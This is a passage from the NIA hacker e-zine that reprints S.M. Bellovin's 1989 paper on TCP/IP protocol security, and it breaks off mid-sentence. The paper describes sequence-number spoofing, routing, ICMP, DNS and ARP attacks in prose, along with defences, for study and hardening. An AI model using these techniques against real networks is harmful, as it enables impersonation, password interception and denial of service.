Founded By: | _ _______ Guardian Of Time | __ N.I.A. _ ___ ___ Are you on any WAN? are Judge Dredd | ____ ___ ___ ___ ___ you on Bitnet, Internet ------------------+ _____ ___ ___ ___ ___ Compuserve, MCI Mail, \ / ___ ___ ___ ___ ___________ Sprintmail, Applelink, +---------+ ___ ___ ___ ___ ___________ Easynet, MilNet, | 05MON18 | ___ ______ ___ ___ ___ FidoNet, et al.? | File 74 | ___ _____ ___ ___ ___ If so please drop us a +---------+ ____ _ __ ___ line at ___ _ ___ nia@nuchat.sccsi.com Internal Affairs BBS __ NIA074 _ Network Information Access Ignorance, There's No Excuse. NIA Issue 074 Volume 2 "I didn't invent the Unix security problem. I just optimized it." Greetings. This newsletter is published on a non-regular basis and is only a hobby by the editors, not a job. No responsibility is taken by the editors for this newsletter, all of that and the credit goes to the contributers. We are changing format again to go with the changing times. First of all, there will be NO news unless it is first hand accounts of it. If you want news, there are plenty of other electronic 'zines and more efficient ways of getting it than to wait for an NIA issue to come out. Second, the articles are going to be getting technical. There is only so many intro/basics we can publish/re-print. We are looking for contributions. All articles submitted must be in a regular format for the magazine. There is a one month review time for the article to be chosen. There is an additional one month revise time if the article is chosen. We do keep copies of everything that is sent to us so if it is not published in the immediate issue than it could be published in a later issue (in which case you will be notified). The readers make the magazine, so if you want to see better issues then do some research and send us reports. ------------------------------------------------------------------------------ 1. Introduction ......................................................Editors 2. Security Problems in TCP/IP Suite [01/02] ...................S.M. Bellovin 3. Security Problems in TCP/IP Suite [02/02] ...................S.M. Bellovin 4. Firewalls: The Design of Secure Internet Gateway ............Bill Cheswick 5. Notes on Centigram Systems ......................................Anonymous 6. How to Steal Information .......................................The Butler 7. Killer Chips: Physical Virus ...................Jean-Bernard Condat [CCCF] ------------------------------------------------------------------------------ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NIA074 / File 02 Security Problems in the TCP/IP Protocol Suite Part I of II S.M. Bellovin AT&T Bell Laboratories ABSTRACT The TCP/IP protocol suite, which is very widely used today, was developed under the sponsorship of the Department of Defense. Despite that, there are a number of serious security flaws inherent in the protocols, regardless of the correctness of any implementations. We describe a variety of attacks based on these flaws, including sequence number spoofing, routing attacks, source address spoofing, and authentication attacks. We also present defenses against these attacks, and conclude with a discussion of broad-spectrum defenses such as encryption. 1. INTRODUCTION The TCP/IP protocol suite[1][2], which is very widely used today, was developed under the sponsorship of the Department of Defense. Despite that, there are a number of serious security flaws inherent in the protocols. Some of these flaws exist because hosts rely on IP source address for authentication; the Berkeley "r-utilities"[3] are a notable example. Others exist because network control mechanisms, and in particular routing protocols, have minimal or non-existent authentication. When describing such attacks, our basic assumption is that the attacker has more or less complete control over some machine connected to the Internet. This may be due to flaws in that machine's own protection mechanisms, or it may be __________ * Author's address: Room 3C-536B AT&T Bell Laboratories, 600 Mountain Avenue, Murray Hill, New Jersey 07974. Reprinted from Computer Communication Review Vol. 19 No. 2, p.32-48, April 1989. because that machine is a microcomputer, and inherently unprotected. Indeed, the attacker may even be a rogue system administrator. 1.1 Exclusions We are not concerned with flaws in particular implementations of the protocols, such as those used by the Internet "worm"[4][5][6]. Rather, we discuss generic problems with the protocols themselves. As will be seen, careful implementation techniques can alleviate or prevent some of these problems. Some of the protocols we discuss are derived from Berkeley's version of the UNIXr system; others are generic Internet protocols. We are also not concerned with classic network attacks, such as physical eavesdropping, or altered or injected messages. We discuss such problems only in so far as they are facilitated or possible because of protocol problems. For the most part, there is no discussion here of vendor- specific protocols. We do discuss some problems with Berkeley's protocols, since these have become de facto standards for many vendors, and not just for UNIX systems. 2. TCP SEQUENCE NUMBER PREDICTION One of the more fascinating security holes was first described by Morris[7]. Briefly, he used TCP sequence number prediction to construct a TCP packet sequence without ever receiving any responses from the server. This allowed him to spoof a trusted host on a local network. The normal TCP connection establishment sequence involves a 3-way handshake. The client selects and transmits an initial sequence number ISNC, the server acknowledges it and sends its own sequence number ISNS, and the client acknowledges that. Following those three messages, data transmission may take place. The exchange may be shown schematically as follows: C->S:SYN(ISNC) S->C:SYN(ISNS),ACK(ISNC) C->S:ACK(ISNS) C->S:data and/or S->C:data That is, for a conversation to take place, C must first hear ISNS, a more or less random number. Suppose, though, that there was a way for an intruder X to predict ISNS. In that case, it could send the following sequence to impersonate trusted host T: X->S:SYN(ISNX),SRC=T S->T:SYN(ISNS),ACK(ISNX) X->S:ACK(ISNS),SRC=T X->S:ACK(ISNS),SRC=T,nasty-data Even though the message S->T does not go to X, X was able to know its contents, and hence could send data. If X were to perform this attack on a connection that allows command execution (i.e., the Berkeley rsh server), malicious commands could be executed. How, then, to predict the random ISN? In Berkeley systems, the initial sequence number variable is incremented by a constant amount once per second, and by half that amount each time a connection is initiated. Thus, if one initiates a legitimate connection and observes the ISNS used, one can calculate, with a high degree of confidence, ISNS' used on the next connection attempt. Morris points out that the reply message S->T:SYN(ISNS),ACK(ISNX) does not in fact vanish down a black hole; rather, the real host T will receive it and attempt to reset the connection. This is not a serious obstacle. Morris found that by impersonating a server port on T, and by flooding that port with apparent connection requests, he could generate queue overflows that would make it likely that the S->T message would be lost. Alternatively, one could wait until T was down for routine maintenance or a reboot. A variant on this TCP sequence number attack, not described by Morris, exploits the netstat[8] service. In this attack, the intruder impersonates a host that is down. If netstat is available on the target host, it may supply the necessary sequence number information on another port; this eliminates all need to guess1. __________ 1. The netstat protocol is obsolete, but is still present on some Internet hosts. Security concerns were not Defenses Obviously, the key to this attack is the relatively coarse rate of change of the initial sequence number variable on Berkeley systems. The TCP specification requires that this variable be incremented approximately 250,000 times per second; Berkeley is using a much slower rate. However, the critical factor is the granularity, not the average rate. The change from an increment of 128 per second in 4.2BSD to 125,000 per second in 4.3BSD is meaningless, even though the latter is within a factor of two of the specified rate. Let us consider whether a counter that operated at a true 250,000 hz rate would help. For simplicity's sake, we will ignore the problem of other connections occurring, and only consider the fixed rate of change of this counter. To learn a current sequence number, one must send a SYN packet, and receive a response, as follows: X->S: SYN(ISNX) S->X: SYN(ISNS),ACK(ISNX) (1) The first spoof packet, which triggers generation of the next sequence number, can immediately follow the server's response to the probe packet: X->S: SYN(ISNX),SRC=T (2) The sequence number ISNS used in the response S->T: SYN(ISNS),ACK(ISNX) is uniquely determined by the time between the origination of message (0) and the receipt at the server of message (0). But this number is precisely the round-trip time between X and S. Thus, if the spoofer can accurately measure (and predict) that time, even a 4-second clock will not defeat this attack. How accurately can the trip time be measured? If we assume that stability is good, we can probably bound it within 10 milliseconds or so. Clearly, the Internet does not exhibit such stability over the long-term[9], but it is often good enough over the short term.2 There is thus an uncertainty of ____________________________________________________________ behind its elimination. 2500 in the possible value for ISNS. If each trial takes 5 seconds, to allow time to re-measure the round-trip time, an intruder would have a reasonable likelihood of succeeding in 7500 seconds, and a near-certainty within a day. More predictable (i.e., higher quality) networks, or more accurate measurements, would improve the odds even further in the intruder's favor. Clearly, simply following the letter of the TCP specification is not good enough. We have thus far tacitly assumed that no processing takes places on the target host. In fact, some processing does take place when a new request comes in; the amount of variability in this processing is critical. On a 6 MIPS machine, one tick -- 4 M-seconds -- is about 25 instructions. There is thus considerable sensitivity to the exact instruction path followed. High-priority interrupts, or a slightly different TCB allocation sequence, will have a comparatively large effect on the actual value of the next sequence number. This randomizing effect is of considerable advantage to the target. It should be noted, though, that faster machines are more vulnerable to this attack, since the variability of the instruction path will take less real time, and hence affect the increment less. And of course, CPU speeds are increasing rapidly. This suggests another solution to sequence number attacks: randomizing the increment. Care must be taken to use sufficient bits; if, say, only the low-order 8 bits were picked randomly, and the granularity of the increment was coarse, the intruder's work factor is only multiplied by 256. A combination of a fine-granularity increment and a small random number generator, or just a 32-bit generator, is better. Note, though, that many pseudo-random number generators are easily invertible[10]. In fact, given that most such generators work via feedback of their output, the enemy could simply compute the next "random" number to be picked. Some hybrid techniques have promise -- using a 32- bit generator, for example, but only emitting 16 bits of it -- but brute-force attacks could succeed at determining the seed. One would need at least 16 bits of random data in ____________________________________________________________ 2. At the moment, the Internet may not have such stability even over the short-term, especially on long-haul connections. It is not comforting to know that the security of a network relies on its low quality of service. each increment, and perhaps more, to defeat probes from the network, but that might leave too few bits to guard against a search for the seed. More research or simulations are needed to determine the proper parameters. Rather than go to such lengths, it is simpler to use a cryptographic algorithm (or device) for ISNS generation. The Data Encryption Standard[11] (DES) in electronic codebook mode[12] is an attractive choice as the ISNS source, with a simple counter as input. Alternatively, DES could be used in output feedback mode without an additional counter. Either way, great care must be taken to select the key used. The time-of-day at boot time is not adequate; sufficiently good information about reboot times is often available to an intruder, thereby permitting a brute-force attack. If, however, the reboot time is encrypted with a per-host secret key, the generator cannot be cracked with any reasonable effort. Performance of the initial sequence number generator is not a problem. New sequence numbers are needed only once per connection, and even a software implementation of DES will suffice. Encryption times of 2.3 milliseconds on a 1 MIPS processor have been reported[13]. An additional defense involves good logging and alerting mechanisms. Measurements of the round-trip time -- essential for attacking RFC-compliant hosts -- would most likely be carried out using ICMP Ping messages; a "transponder" function could log excessive ping requests. Other, perhaps more applicable, timing measurement techniques would involve attempted TCP connections; these connections are conspicuously short-lived, and may not even complete SYN processing. Similarly, spoofing an active host will eventually generate unusual types of RST packets; these should not occur often, and should be logged. 3. THE JOY OF ROUTING Abuse of the routing mechanisms and protocols is probably the simplest protocol-based attack available. There are a variety of ways to do this, depending on the exact routing protocols used. Some of these attacks succeed only if the remote host does source address-based authentication; others can be used for more powerful attacks. A number of the attacks described below can also be used to accomplish denial of service by confusing the routing tables on a host or gateway. The details are straight-forward corollaries of the penetration mechanisms, and will not be described further. 3.1 Source Routing If available, the easiest mechanism to abuse is IP source routing. Assume that the target host uses the reverse of the source route provided in a TCP open request for return traffic. Such behavior is utterly reasonable; if the originator of the connection wishes to specify a particular path for some reason -- say, because the automatic route is dead -- replies may not reach the originator if a different path is followed. The attacker can then pick any IP source address desired, including that of a trusted machine on the target's local network. Any facilities available to such machines become available to the attacker. Defenses It is rather hard to defend against this sort of attack. The best idea would be for the gateways into the local net to reject external packets that claim to be from the local net. This is less practical than it might seem since some Ethernet3 network adapters receive their own transmissions, and this feature is relied upon by some higher-level protocols. Furthermore, this solution fails completely if an organization has two trusted networks connected via a multi-organization backbone. Other users on the backbone may not be trustable to the same extent that local users are presumed to be, or perhaps their vulnerability to outside attack is higher. Arguably, such topologies should be avoided in any event. A simpler method might be to reject pre-authorized connections if source routing information was present. This presumes that there are few legitimate reasons for using this IP option, especially for relatively normal operations. A variation on this defense would be to analyze the source route and accept it if only trusted gateways were listed; that way, the final gateway could be counted on to deliver the packet only to the true destination host. The complexity of this idea is probably not worthwhile. __________ 3. Ethernet is a registered trademark of Xerox Corporation. Some protocols (i.e., Berkeley's rlogin and rsh) permit ordinary users to extend trust to remote host/user combinations. In that case, individual users, rather than an entire system, may be targeted by source routing attacks.4 Suspicious gateways[14] will not help here, as the host being spoofed may not be within the security domain protected by the gateways. 3.2 Routing Attacks The Routing Information Protocol[15] (RIP) is used to propagate routing information on local networks, especially broadcast media. Typically, the information received is unchecked. This allows an intruder to send bogus routing information to a target host, and to each of the gateways along the way, to impersonate a particular host. The most likely attack of this sort would be to claim a route to a particular unused host, rather than to a network; this would cause all packets destined for that host to be sent to the intruder's machine. (Diverting packets for an entire network might be too noticeable; impersonating an idle work-station is comparatively risk-free.) Once this is done, protocols that rely on address-based authentication are effectively compromised. This attack can yield more subtle, and more serious, benefits to the attacker as well. Assume that the attacker claims a route to an active host or workstation instead. All packets for that host will be routed to the intruder's machine for inspection and possible alteration. They are then resent, using IP source address routing, to the intended destination. An outsider may thus capture passwords and other sensitive data. This mode of attack is unique in that it affects outbound calls as well; thus, a user calling out from the targeted host can be tricked into divulging a password. Most of the earlier attacks discussed are used to forge a source address; this one is focused on the destination address. __________ 4. Permitting ordinary users to extend trust is probably wrong in any event, regardless of abuse of the protocols. But such concerns are beyond the scope of this paper. Defenses A RIP attack is somewhat easier to defend against than the source-routing attacks, though some defenses are similar. A paranoid gateway -- one that filters packets based on source or destination address -- will block any form of host- spoofing (including TCP sequence number attacks), since the offending packets can never make it through. But there are other ways to deal with RIP problems. One defense is for RIP to be more skeptical about the routes it accepts. In most environments, there is no good reason to accept new routes to your own local networks. A router that makes this check can easily detect intrusion attempts. Unfortunately, some implementations rely on hearing their own broadcasts to retain their knowledge of directly- attached networks. The idea, presumably, is that they can use other networks to route around local outages. While fault-tolerance is in general a good idea, the actual utility of this technique is low in many environments compared with the risks. It would be useful to be able to authenticate RIP packets; in the absence of inexpensive public-key signature schemes, this is difficult for a broadcast protocol. Even if it were done, its utility is limited; a receiver can only authenticate the immediate sender, which in turn may have been deceived by gateways further upstream. Even if the local routers don't implement defense mechanisms, RIP attacks carry another risk: the bogus routing entries are visible over a wide area. Any router (as opposed to host) that receives such data will rebroadcast it; a suspicious administrator almost anywhere on the local collection of networks could notice the anomaly. Good log generation would help, but it is hard to distinguish a genuine intrusion from the routing instability that can accompany a gateway crash. 3.3 Exterior Gateway Protocol The Exterior Gateway Protocol (EGP)[16] is intended for communications between the core gateways and so-called exterior gateways. An exterior gateway, after going through a neighbor acquisition protocol, is periodically polled by the core; it responds with information about the networks it serves. These networks must all be part of its autonomous system. Similarly, the gateway periodically requests routing information from the core gateway. Data is not normally sent except in response to a poll; furthermore, since each poll carries a sequence number that must be echoed by the response, it is rather difficult for an intruder to inject a false route update. Exterior gateways are allowed to send exactly one spontaneous update between any two polls; this, too, must carry the sequence number of the last poll received. It is thus comparatively difficult to interfere in an on-going EGP conversation. One possible attack would be to impersonate a second exterior gateway for the same autonomous system. This may not succeed, as the core gateways could be equipped with a list of legitimate gateways to each autonomous system. Such checks are not currently done, however. Even if they were, they could be authenticated only by source IP address. A more powerful attack would be to claim reachability for some network where the real gateway is down. That is, if gateway G normally handles traffic for network N, and G is down, gateway G' could advertise a route to that network. This would allow password capture by assorted mechanisms. The main defense against this attack is topological (and quite restrictive): exterior gateways must be on the same network as the core; thus, the intruder would need to subvert not just any host, but an existing gateway or host that is directly on the main net. A sequence number attack, similar to those used against TCP, might be attempted; the difficulty here is in predicting what numbers the core gateway is using. In TCP, one can establish arbitrary connections to probe for information; in EGP, only a few hosts may speak to the core. (More accurately, the core could only speak to a few particular hosts, though as noted such checks are not currently implemented.) It may thus be hard to get the raw data needed for such an attack. 3.4 The Internet Control Message Protocol The Internet Control Message Protocol (ICMP)[17] is the basic network management tool of the TCP/IP protocol suite. It would seem to carry a rich potential for abuse. Surprisingly, ICMP attacks are rather difficult; still, there are often holes that may be exploited. The first, and most obvious target, is the ICMP Redirect message; it is used by gateways to advise hosts of better routes. As such it can often be abused in the same way that RIP can be. The complication is that a Redirect message must be tied to a particular, existing connection; it cannot be used to make an unsolicited change to the host's routing tables. Furthermore, Redirects are only applicable within a limited topology; they may be sent only from the first gateway along the path to the originating host. A later gateway may not advise that host, nor may it use ICMP Redirect to control other gateways. Suppose, though, that an intruder has penetrated a secondary gateway available to a target host, but not the primary one. (It may suffice to penetrate an ordinary host on the target's local network, and have it claim to be a gateway.) Assume further that the intruder wishes to set up a false route to trusted host T through that compromised secondary gateway. The following sequence may then be followed. Send a false TCP open packet to the target host, claiming to be from T. The target will respond with its own open packet, routing it through the secure primary gateway. While this is in transit, a false Redirect may be sent, claiming to be from the primary gateway, and referring to the bogus connection. This packet will appear to be a legitimate control message; hence the routing change it contains will be accepted. If the target host makes this change to its global routing tables, rather than just to the per- connection cached route, the intruder may proceed with spoofing host T. Some hosts do not perform enough validity checks on ICMP Redirect messages; in such cases, the impact of this attack becomes similar to RIP-based attacks. ICMP may also be used for targeted denial of service attacks. Several of its messages, such as Destination Unreachable and Time to Live Exceeded, may be used to reset existing connections. If the intruder knows the local and remote port numbers of a TCP connection, an ICMP packet aimed at that connection may be forged5. Such information is sometimes available through the netstat service. A more global denial of service attack can be launched by sending a fraudulent Subnet Mask Reply message. Some hosts will accept any such message, whether they have sent a query or not; a false one could effectively block all communications with the target host. __________ 5. In fact, such programs are available today; they are used as administrative tools to reset hung TCP connections. Defenses Most ICMP attacks are easy to defend against with just a modicum of paranoia. If a host is careful about checking that a message really does refer to a particular connection, most such attacks will not succeed. In the case of TCP, this includes verifying that the ICMP packet contains a plausible sequence number in the returned-packet portion. These checks are less applicable to UDP, though. A defense against Redirect attacks merits additional attention, since such attacks can be more serious. Probably, the best option is to restrict route changes to the specified connection; the global routing table should not be modified in response to ICMP Redirect messages6. Finally, it is worth considering whether ICMP Redirects are even useful in today's environment. They are only usable on local networks with more than one gateway to the outside world. But it is comparatively easy to maintain complete and correct local routing information. Redirect messages would be most useful from the core gateways to local exterior gateways, as that would allow such local gateways to have less than complete knowledge of the Internet; this use is disallowed, however. Subnet Mask attacks can be blocked if the Reply packet is honored only at the appropriate time. In general, a host wants to see such a message only at boot time, and only if it had issued a query; a stale reply, or an unsolicited reply, should be rejected out of hand. There is little defense against a forged reply to a genuine Subnet Mask query, as a host that has sent such a query typically has few resources with which to validate the response. If the genuine response is not blocked by the intruder, though, the target will receive multiple replies; a check to ensure that all replies agree would guard against administrative errors as well. __________ 6. This has other benefits as well, especially in environments where ICMP-initiated route changes are not timed out. The author has seen situations where RIP instability following a gateway crash has led to erroneous ICMP Redirect messages. These had the effect of permanently corrupting the routing tables on other hosts. 4. THE "AUTHENTICATION" SERVER As an alternative to address-based authentication, some implementations use the Authentication Server[18]. A server that wishes to know the identity of its client may contact the client host's Authentication Server7, and ask it for information about the user owning a particular connection. This method is inherently more secure than simple address- based authentication, as it uses a second TCP connection not under control of the attacker. It thus can defeat sequence number attacks and source routing attacks. There are certain risks, however. The first, and most obvious, is that not all hosts are competent to run authentication servers. If the client host is not secure, it does not matter who the user is claimed to be; the answer cannot be trusted. Second, the authentication message itself can be compromised by routing table attacks. If RIP has been used to alter the target's idea of how to reach some host, the authentication query will rely on the same altered routing data. Finally, if the target host is down, a variant on the TCP sequence number attack may be used; after the server sends out a TCP open request to the presumed authentication server, the attacker can complete the open sequence and send a false reply. If the target runs a netstat server, this is even easier; as noted, netstat will often supply the necessary sequence numbers with no need to guess. A less-obvious risk is that a fake authentication server can always reply "no". This constitutes a denial of service attack. Defenses A server that wishes to rely on another host's idea of a user should use a more secure means of validation, such as the Needham-Schroeder algorithm[20][21][22]. TCP by itself is inadequate. __________ 7. The Internet Activities Board does not currently recommend the Authentication Server for implementation[19]. However, the decision was not made because of security problems[5]. 5. HERE BE DRAGONS Some protocols, while not inherently flawed, are nevertheless susceptible to abuse. A wise implementor would do well to take these problems into account when providing the service. 5.1 The "Finger" Service Many systems implement a finger service[23]. This server will display useful information about users, such as their full names, phone numbers, office numbers, etc. Unfortunately, such data provides useful grist for the mill of a password cracker.[24] By running such a service, a system administrator is giving away this data. 5.2 Electronic Mail Electronic mail is probably the most valuable service on the Internet. Nevertheless, it is quite vulnerable to misuse. As normally implemented[25][26], the mail server provides no authentication mechanisms. This leaves the door wide open to faked messages. RFC 822 does support an Encrypted header line, but this is not widely used. (However, see RFC 1040[27] for a discussion of a proposed new encryption standard for electronic mail.) 5.2.1 The Post Office Protocol The The Post Office Protocol (POP)[28] allows a remote user to retrieve mail stored on a central server machine. Authentication is by means of a single command containing both the user name and the password. However, combining the two on a single command mandates the use of conventional passwords. And such passwords are becoming less popular; they are too vulnerable to wire-tappers, intentional or accidental disclosure, etc. As an alternative, many sites are adopting "one-time passwords"8. With one-time passwords, the host and some device available to the user share a cryptographic key. The host issues a random challenge; both sides encrypt this number, and the user transmits it back to the host. Since __________ 8. One-time passwords were apparently first used for military IFF (Identification Friend or Foe) systems[29]. the challenge is random, the reply is unique to that session, thereby defeating eavesdroppers. And since the user does not know the key -- it is irretrievably stored in the device -- the password cannot be given away without depriving the user of the ability to log in. The newest version of POP[30] has split the user name and password into two commands, which is useful. However, it also defines an optional mechanism for preauthenticated connections, typically using Berkeley's mechanisms. Commendably, the security risks of this variant are mentioned explicitly in the document. 5.2.2 PCMAIL The PCMAIL protocol[31] uses authentication mechanisms similar to those in POP2. In one major respect, PCMAIL is more dangerous: it supports a password-change command. This request requires that both the old and new passwords be transmitted unencrypted. 5.3 The Domain Name System The Domain Name System (DNS)[32][33] provides for a distributed database mapping host names to IP addresses. An intruder who interferes with the proper operation of the DNS can mount a variety of attacks, including denial of service and password collection. There are a number of vulnerabilities. In some resolver implementations, it is possible to mount a sequence number attack against a particular user. When the target user attempts to connect to a remote machine, an attacker can generate a domain server response to the target's query. This requires knowing both the UDP port used by the client's resolver and the DNS sequence number used for the query. The latter is often quite easy to obtain, though, since some resolvers always start their sequence numbers with 0. And the former may be obtainable via netstat or some analogous host command. A combined attack on the domain system and the routing mechanisms can be catastrophic. The intruder can intercept virtually all requests to translate names to IP addresses, and supply the address of a subverted machine instead; this would allow the intruder to spy on all traffic, and build a nice collection of passwords if desired. For this reason, domain servers are high-value targets; a sufficiently determined attacker might find it useful to take over a server by other means, including subverting the machine one is on, or even physically interfering with its link to the Internet. There is no network defense against the former, which suggests that domain servers should only run on highly secure machines; the latter issue may be addressed by using authentication techniques on domain server responses. The DNS, even when functioning correctly, can be used for some types of spying. The normal mode of operation of the DNS is to make specific queries, and receive specific responses. However, a zone transfer (AXFR) request exists that can be used to download an entire section of the database; by applying this recursively, a complete map of the name space can be produced. Such a database represents a potential security risk; if, for example, an intruder knows that a particular brand of host or operating system has a particular vulnerability, that database can be consulted to find all such targets. Other uses for such a database include espionage; the number and type of machines in a particular organization, for example, can give away valuable data about the size of the organization, and hence the resources committed to a particular project. Fortunately, the domain system includes an error code for "refused"; an administrative prohibition against such zone transfers is explicitly recognized as a legitimate reason for refusal. This code should be employed for zone transfer requests from any host not known to be a legitimate secondary server. Unfortunately, there is no authentication mechanism provided in the AXFR request; source address authentication is the best that can be done. Recently, a compatible authentication extension to the DNS has been devised at M.I.T. The Hesiod name server[34] uses Kerberos[35] tickets to authenticate queries and responses. The additional information section of the query carries an encrypted ticket, which includes a session key; this key, known only to Hesiod and the client, is used to compute a cryptographic checksum of the both the query and the response. These checksums are also sent in the additional information field. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NIA074 / File 03 Security Problems in the TCP/IP Protocol Suite Part II of II S.M. Bellovin AT&T Bell Laboratories 5.4 The File Transfer Protocol The File Transfer Protocol (FTP)[36] itself is not flawed. However, a few aspects of the implementation merit some care. 5.4.1 FTP Authentication FTP relies on a login and password combination for authentication. As noted, simple passwords are increasingly seen as inadequate; more and more sites are adopting one- time passwords. Nothing in the FTP specification precludes such an authentication method. It is vital, however, that the "331" response to a USER subcommand be displayed to the user; this message would presumably contain the challenge. An FTP implementation that concealed this response could not be used in this mode; if such implementations are (or become) common, it may be necessary to use a new reply code to indicate that the user must see the content of the challenge. 5.4.2 Anonymous FTP A second problem area is "anonymous FTP". While not required by the FTP specification, anonymous FTP is a treasured part of the oral tradition of the Internet. Nevertheless, it should be implemented with care. One part of the problem is the implementation technique chosen. Some implementations of FTP require creation of a partial replica of the directory tree; care must be taken to ensure that these files are not subject to compromise. Nor should they contain any sensitive information, such as encrypted passwords. The second problem is that anonymous FTP is truly anonymous; there is no record of who has requested what information. Mail-based servers will provide that data; they also provide useful techniques for load-limiting9, background transfers, etc. 5.5 Simple Network Management Protocol The Simple Network Management Protocol (SNMP)[37] has recently been defined to aid in network management. Clearly, access to such a resource must be heavily protected. The RFC states this, but also allows for a null __________ 9. Recently, a host was temporarily rendered unusable by massive numbers of FTP requests for a popular technical report. If this were deliberate, it would be considered a successful denial of service attack. authentication service; this is a bad idea. Even a "read- only" mode is dangerous; it may expose the target host to netstat-type attacks if the particular Management Information Base (MIB)[38] used includes sequence numbers. (The current standardized version does not; however, the MIB is explicitly declared to be extensible.) 5.6 Remote Booting Two sets of protocols are used today to boot diskless workstations and gateways, Reverse ARP (RARP)[39] with the Trivial File Transfer Protocol (TFTP)[40] and BOOTP[41] with TFTP. A system being booted is a tempting target; if one can subvert the boot process, a new kernel with altered protection mechanisms can be substituted. RARP-based booting is riskier because it relies on Ethernet-like networks, with all the vulnerabilities adhering thereto. One can achieve a modest improvement in security by ensuring that the booting machine uses a random number for its UDP source port; otherwise, an attacker can impersonate the server and send false DATA packets. BOOTP adds an additional layer of security by including a 4-byte random transaction id. This prevents an attacker from generating false replies to a workstation known to be rebooting. It is vital that these numbers indeed be random; this can be difficult in a system that is freshly powered up, and hence with little or no unpredictable state. Care should be taken when booting through gateways; the more networks traversed, the greater the opportunity for impersonation. The greatest measure of protection is that normally, the attacker has only a single chance; a system being booted does not stay in that state. If, however, communications between the client and the standard server may be interrupted, larger-scale attacks may be mounted. 6. TRIVIAL ATTACKS A few attacks are almost too trivial to mention; nevertheless, completeness demands that they at least be noted. 6.1 Vulnerability of the Local Network Some local-area networks, notably the Ethernet networks, are extremely vulnerable to eavesdropping and host-spoofing. If such networks are used, physical access must be strictly controlled. It is also unwise to trust any hosts on such networks if any machine on the network is accessible to untrusted personnel, unless authentication servers are used. If the local network uses the Address Resolution Protocol (ARP)[42] more subtle forms of host-spoofing are possible. In particular, it becomes trivial to intercept, modify, and forward packets, rather than just taking over the host's role or simply spying on all traffic. It is possible to launch denial of service attacks by triggering broadcast storms. There are a variety of ways to do this; it is quite easy if most or all of the hosts on the network are acting as gateways. The attacker can broadcast a packet destined for a non-existent IP address. Each host, upon receiving it, will attempt to forward it to the proper destination. This alone will represent a significant amount of traffic, as each host will generate a broadcast ARP query for the destination. The attacker can follow up by broadcasting an ARP reply claiming that the broadcast Ethernet address is the proper way to reach that destination. Each suspectible host will then not only resend the bogus packet, it will also receive many more copies of it from the other suspectible hosts on the network. 6.2 The Trivial File Transfer Protocol TFTP[40] permits file transfers without any attempt at authentication. Thus, any publicly-readable file in the entire universe is accessible. It is the responsibility of the implementor and/or the system administrator to make that universe as small as possible. 6.3 Reserved Ports Berkeley-derived TCPs and UDPs have the notion of a "privileged port". That is, port numbers lower than 1024 may only be allocated to privileged processes. This restriction is used as part of the authentication mechanism. However, neither the TCP nor the UDP specifications contain any such concept, nor is such a concept even meaningful on a single-user computer. Administrators should never rely on the Berkeley authentication schemes when talking to such machines. 7. COMPREHENSIVE DEFENSES Thus far, we have described defenses against a variety of individual attacks. Several techniques are broad-spectrum defenses; they may be employed to guard against not only these attacks, but many others as well. 7.1 Authentication Many of the intrusions described above succeed only because the target host uses the IP source address for authentication, and assumes it to be genuine. Unfortunately, there are sufficiently many ways to spoof this address that such techniques are all but worthless. Put another way, source address authentication is the equivalent of a file cabinet secured with an S100 lock; it may reduce the temptation level for more-or-less honest passers-by, but will do little or nothing to deter anyone even slightly serious about gaining entry. Some form of cryptographic authentication is needed. There are several possible approaches. Perhaps the best-known is the Needham-Schroeder algorithm[20][21][22]. It relies on each host sharing a key with an authentication server; a host wishing to establish a connection obtains a session key from the authentication server and passes a sealed version along to the destination. At the conclusion of the dialog, each side is convinced of the identity of the other. Versions of the algorithm exist for both private-key and public-key[43] cryptosystems. How do these schemes fit together with TCP/IP? One answer is obvious: with them, preauthenticated connections can be implemented safely; without them, they are quite risky. A second answer is that the DNS provides an ideal base for authentication systems, as it already incorporates the necessary name structure, redundancy, etc. To be sure, key distribution responses must be authenticated and/or encrypted; as noted, the former seems to be necessary in any event. In some environments, care must be taken to use the session key to encrypt the entire conversation; if this is not done, an attacker can take over a connection via the mechanisms described earlier. 7.2 Encryption Suitable encryption can defend against most of the attacks outlined above. But encryption devices are expensive, often slow, hard to administer, and uncommon in the civilian sector. There are different ways to apply encryption; each has its strengths and weaknesses. A comprehensive treatment of encryption is beyond the scope of this paper; interested readers should consult Voydock and Kent[44] or Davies and Price[45]. Link-level encryption -- encrypting each packet as it leaves the host computer -- is an excellent method of guarding against disclosure of information. It also works well against physical intrusions; an attacker who tapped in to an Ethernet cable, for example, would not be able to inject spurious packets. Similarly, an intruder who cut the line to a name server would not be able to impersonate it. The number of entities that share a given key determines the security of the network; typically, a key distribution center will allocate keys to each pair of communicating hosts. Link-level encryption has some weaknesses, however. Broadcast packets are difficult to secure; in the absence of fast public-key cryptosystems, the ability to decode an encrypted broadcast implies the ability to send such a broadcast, impersonating any host on the network. Furthermore, link-level encryption, by definition, is not end-to-end; security of a conversation across gateways implies trust in the gateways and assurance that the full concatenated internet is similarly protected. (This latter constraint may be enforced administratively, as is done in the military sector.) If such constraints are not met, tactics such as source-routing attacks or RIP-spoofing may be employed. Paranoid gateways can be deployed at the entrance to security domains; these might, for example, block incoming RIP packets or source-routed packets. Many portions of the DARPA Internet employ forms of link encryption. All Defense Data Network (DDN) IMP-to-IMP trunks use DES encryption, even for non-classified traffic; classified lines use more secure cryptosystems[46]. These, however, are point-to-point lines, which are comparatively easy to protect. A multi-point link encryption device for TCP/IP is the Blacker Front End (BFE)[47]. The BFE looks to the host like an X.25 DDN interface, and sits between the host and the actual DDN line. When it receives a call request packet specifying a new destination, it contacts an Access Control Center (ACC) for permission, and a Key Distribution Center (KDC) for cryptographic keys. If the local host is denied permission to talk to the remote host, an appropriate diagnostic code is returned. A special "Emergency Mode" is available for communications to a restricted set of destinations at times when the link to the KDC or ACC is not working. The permission-checking can, to some extent, protect against the DNS attacks described earlier. Even if a host has been mislead about the proper IP address for a particular destination, the BFE will ensure that a totally unauthorized host does not receive sensitive data. That is, assume that a host wishes to send Top Secret data to some host foo. A DNS attack might mislead the host into connecting to penetrated host 4.0.0.4, rather than 1.0.0.1. If 4.0.0.4 is not cleared for Top Secret material, or is not allowed communications with the local host, the connection attempt will fail. To be sure, a denial 